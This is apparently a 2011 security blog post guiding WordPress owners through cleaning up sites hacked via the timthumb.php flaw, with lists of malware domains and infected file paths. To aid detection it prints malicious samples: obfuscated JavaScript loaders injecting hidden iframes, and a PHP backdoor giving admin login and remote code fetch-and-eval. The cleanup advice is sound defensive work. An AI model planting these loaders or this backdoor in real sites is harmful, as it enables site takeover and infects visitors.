Malicious software is hosted on newportalse.com, counter-wordpress.com, ?.us.to/kwizhveo.php

newportalse.com, counter-wordpress.com

There are currently a large number of Wordpress sites that have been hacked where the domain being listed on the warning page is newportalse.com. In most cases the first indicator of this hack has been when the site owner is notified by a user that they have gotten a warning when visiting the site and/or the site owner gets a warning when viewing one of their pages in Chrome or Firefox.  In all cases the warnings are intermittent, the owner or a user might visit the page 20 times and not get the warning and then on the 21st visit the warning will pop up. In a couple of cases the domain hosting the malware has also varied, one time the warning will read newportalse.com and the next time the warning pops up it will read young-girls-fucking.com or realjailbaitgirls.com. In most cases when the site owner checks the Google Diagnostic page it has indicated "not suspicious". This hack is very well cloaked and it is taking a long time for Google to find the malicious content and flag the site.

Note: In their efforts to keep this hack cloaked from both Google and site owners the domain being used to host the malware is being changed pretty rapidly.  As soon as Google flags one of the domains the hackers are switching to a new one.  I have seen newportalse.com, counter-wordpress.com, young-girls-fucking.com, realjailbaitgirls.com, getsextoys.biz, hanna-heartbreaker.com, corporateactivate.ru, teenburgmovies.biz, and bestsexygirlfriend.com used in the last couple of days.

In all cases the hackers have gained access to the site through a vulnerability in a popular php script named timthumb.php or thumb.php.  The script is used to manipulate, crop/re-size web images and can be found in a large number of Wordpress themes.  The first thing you will need to do is check all your themes, including any unused themes lurking on your site, for any that use timthumb/thumb and then update all occurrences of timthumb to the latest version. The following ref explains how to update and provides a link to the latest version.

Ref:  http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

The next step is to clean up the JavaScript files used on your site. To date the hackers have been primarily using wp-includes/js/l10n.js and/or /wp-includes/js/jquery/jquery.js and/or /wp-content/themes/*[your themes names]*/inc/jquery-1.2.6.min.js. In more recent hacks the Javascript files located with the sites themes seem to be the primary targets, such as /wp-content/themes/combat/js/jquery-1.4.2.min.js. You should check all JavaScript files and if you have any doubts replace them with known clean versions.

There are a couple of variants of malicious obfuscated JavaScript that I have seen. An example of malicious script found in wp-includes/js/l10n.js on one site -

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];ev​al(fun​ction (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.to​String(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.to​String(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[fun​ction (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=fun​ction (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new Reg​Exp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

The original/clean content is in green and the added malicious content is in red.  The malicious content de-obfuscates to

function MakeFrame(){
  var el = document.createElement("iframe");
  document.body.appendChild(el);
  el.id = 'iframe';
  el.style.width = '1px';
  el.style.height = '1px';
  el.src = 'http:// counter-wordpress . com/frame.php'
}
setTimeout(MakeFrame, 1000);

The malicious content adds an iframe to the page which loads the malicious payload from http:// counter-wordpress . com/frame.php

The contents of a "clean" will be something like this

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};


Another variant seen in  wp-includes/js/jquery/jquery.js?ver=1.4.2

var mIbYkFM=3175567; var sUAkPsk=1302948; var MFcBEnpC=18475; var jQ37c02B=537145; var OCGhllC = new Array(4997287, 4997302, 4997295, 4997284, 4997301, 4997290, 4997296, 4997295, 4997217, 4997262, 4997282, 4997292, 4997286, 4997255, 4997299, 4997282, 4997294, 4997286, 4997225, 4997226, 4997308, ....  

(a long array of numbers) ....

4997219, 4997229, 4997234, 4997233, 4997233, 4997233, 4997226, 4997244, 4997310);Wqv8c = "";for (pOf21 = 0; pOf21 < OCGhllC.length; pOf21 ++) { Wqv8c = Wqv8c + String.fromCharCode(OCGhllC[pOf21]-jQ37c02B+MFcBEnpC-sUAkPsk-mIbYkFM); }; eval(Wqv8c);

In some of the more recent hacks a new wrinkle has been added along with the JavaScript hack. The hackers installed a malicious script at /wordpressinstalldir/wp-mail.php and then hacked WP Super cache to add an iframe

< if rame src="http:// www . xxxxxx . net/wordpressinstalldir/wp-mail.php" name="mailiframe" width="0" height="0" frameborder="0" scrolling="no" title=""> < /if rame >

to the end of the sites pages to load the malicious content. The thing to look for here is the iframe, the path/filename could be anything.

Next you will need to check some of your core php files, start with functions.php file in your themes, in some cases it will only be in the active theme, but check any in-active themes you may still have on your site.  Typically there will be 100s of blank lines then the code.

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'xxxxxxx'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

You need to delete these lines. You should also check core files such wp-config, wp-settings .php. Make sure you scroll all the way to the end of the file as there will likely be 100s of blank lines before the any malicious code. Again if you have any doubts about the content in any file you should replace it with a known clean version.

If you do not have a known clean copy of a file download a fresh install of Wordpress and extract any files you need to replace.

On many of the sites the following malicious file are being found

/wp-content/upd.php
/wp-content/data.php
/wp-admin/upd.php
/wp-admin/js/config.php
/wp-admin/common.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php
/wp-content/themes/*[your themes names]*/cache/.htaccess
/wp-content/themes/*[your themes names]*/temp/[eab9c5e9815adc4c40a6557495eed6d3.php]
[or similar file names]

*[your themes names]* You should check both your active theme and any inactive themes you may have left in place on your site.

They are malicious and should be deleted. Suggest you also install the script simple program to find files containing base64_decode linked under Useful(?) tools on this page and give it a try. Instructions for installing the script and using it or on the page.

---

Update 08/24/2011

?.us.to/kwizhveo.php

It looks like we have another group of hackers exploiting the vulnerability in timthumb. This group is not using the javascript files, they are using php code to insert an iframe into the pages of the site.  In the one I looked at tonight the iframe is

<if rame src="http://prettyrosseande.us.to/kwizhveo.php" width="1" height="1" frameborder="0"> </if rame>

The code is appearing between two comment tags < !-- Wordpress Counter --> and looked like this on a second site.

< !-- Wordpress Counter -->
< sc ript language="javascript">
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");
func tion SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
< /sc ript >
< if rame src="http:// nightlynet771.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
< /if rame >
< !-- Wordpress Counter -->

The domain name is dynamic, changes from request to request so there is some code writing the domain name but the .us.to/kwizhveo.php part seems to be staying the same for now.

In this hack the php code of the site is being hacked to add the iframe. If you see this type of iframe you will need to check your php code, index.php, header.php, footer.php and so on for the malicious code. On the second site the code was in the header in the sites theme.

---

Redirects to malicious .ru sites --

guide-securesoft.ru, insanetrip.ru, protect-now.ru, connection-trip.ru, tripinternational.ru, softwareid.ru, touch-pad.ru-internet.ru

In many cases these hacks are also backed up with a hack of the .htaccess file so you will need to check that if you are on Apache.  In most cases the hack has been a redirect to the URL http:// generationgeneration-internet.ru /pcollection/index.php.  There are some tips on checking the .htaccess file here.

It looks like there is an increase in the number of sites doing the redirect to a malicious site thing. There are also some new domains being reported such as softwareid.ru/zisec/index.php (thanks Mark)

I am also starting to see some sites where only a request for a non-existing page, a page that generates a 404 file not found error redirects to a malicious site, http:// guide-securesoft.ru /[*some random letters*]/index.php and insanetrip.ru seem to be a common target for the redirects.  To check for this type of hack try requesting  a URL like http://yourdomain.com/no-exist.html using the file viewer tool.  If you happen to have a file named /no-exist.html just use a file name your are sure does not exist on your site.

---

Also with this hack the hackers have been installing a backdoor on the site so they can maintain access to the site.  You will need to check through the files on your site for any backdoors.  There is an example of a typical backdoor here. These backdoor scripts can be very difficult to find as they can be placed in any folder on the site and the name of the file can be anything.  Typically the hackers will try to hide the file by using innocuous sounding names such as search.php. On one site the backdoor was found in a file named FUNCTIONS_EXTRA.PHP in the /wp-content/themes/[*your theme*]/ folder.  I have also seen file names such as log.php, sm3.php, wp.php, r(d).php (r1.php, r2.php and so on), data.php, and stats.php used in the past. Another common technique used by hackers is to use php code but name the file with a .txt or maybe a .jpg extension. If you find php script in a file with something other than a .php extension it is likely a bad thing.

Once you have gotten your site cleaned up you MAY need to submit a review request to Google. Check to see if Google is flagging your site by opening the diagnostic page for your site at http://www.google.com/safebrowsing/diagnostic?site=yourdomain. If the page lists your site as suspicious then you will need to submit a review request to Google and get your site cleared before the warnings will be removed. If your site is listed as not suspicious then the warnings should disappear as soon as your site is cleaned up (you may need to delete browser history/cache).

Update  09/03/2011 In the comments below Randy provides a real good description of a spam type hack, a pharma hack. It appears likely the hackers gained access to the Wordpress Site through the timthumb/thumb.php vulnerability. Randy has written a post about the hack, what to look for and how to clean it up     Hack Alert: wp-image.php is not a valid WordPress file — Randy Tayler, Eccentric Hundredaire

Some helpful articles:

Hardening WordPress